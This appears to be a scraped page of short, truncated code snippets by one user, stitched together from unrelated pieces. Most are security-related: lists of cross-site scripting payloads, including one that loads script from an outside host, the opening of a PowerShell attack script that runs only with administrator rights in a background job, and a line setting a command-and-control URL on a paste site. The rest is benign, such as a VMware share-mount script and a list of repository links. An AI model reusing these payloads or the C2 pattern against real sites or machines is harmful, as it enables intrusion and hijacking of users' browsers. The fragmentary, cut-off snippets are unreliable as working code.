diegoalbuquerque

/*
Inspired by this post https://www.deepfryd.com/burp-academy-apprentice/

How to use:
1) Browse to https://portswigger.net/web-security/all-labs.
2) Open your web browser's Developer tools by pressing 'F12' on your keyboard.
3) Click on the console tab.
4) Paste the following Javascript code into the console's prompt and hit 'Enter' on the keyboard.
5) Wait for all the labs to be updated with their respective levels (Tested ~12s)

diegoalbuquerque

# write-up: https://www.varonis.com/blog/author/tokyoneon/

# an if statement to prevent the attack from executing without administrator privileges
if (whoami /groups | findstr /i "S-1-16-12288")
{
	# start the attack as a background processs to prevent the PS terminal from stalling when opened
	Start-Job {
		# where to write data during the attack?
		$temp = "$env:TEMP"

diegoalbuquerque

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">

diegoalbuquerque

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

diegoalbuquerque

#!/bin/bash

vmware-hgfsclient | while read folder; do
  echo "[i] Mounting ${folder}   (/mnt/hgfs/${folder})"
  mkdir -p "/mnt/hgfs/${folder}"
  umount -f "/mnt/hgfs/${folder}" 2>/dev/null
  vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "/mnt/hgfs/${folder}"
done

sleep 2s

diegoalbuquerque

https://github.com/github/training-kit

https://github.com/AdguardTeam/AdGuardHome

https://github.com/TH3xACE/SUDO_KILLER

https://github.com/simbody/simbody

https://github.com/qtc-de/remote-method-guesser

diegoalbuquerque

ping 127.0.0.1
$urlc2="https://rentry.co/piu2/raw"

diegoalbuquerque

# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:4443

import BaseHTTPServer, SimpleHTTPServer
import ssl

diegoalbuquerque

Electron apps

• Marp: Markdown presentation ecosystem.

• muryoimpl/slippr: markdown presentation app by Electron

• joe-re/cafe-pitch Markdown-driven presentation tool built on Electron.

Slide deck frameworks supporting Markdown source

diegoalbuquerque

#compdef msfvenom 
#autoload
#
# zsh completion for msfvenom in Metasploit Framework Project (https://www.metasploit.com)
#
# license: GNU General Public License v3.0
#
# Copyright (c) 2018, Green-m
# All rights reserved.
#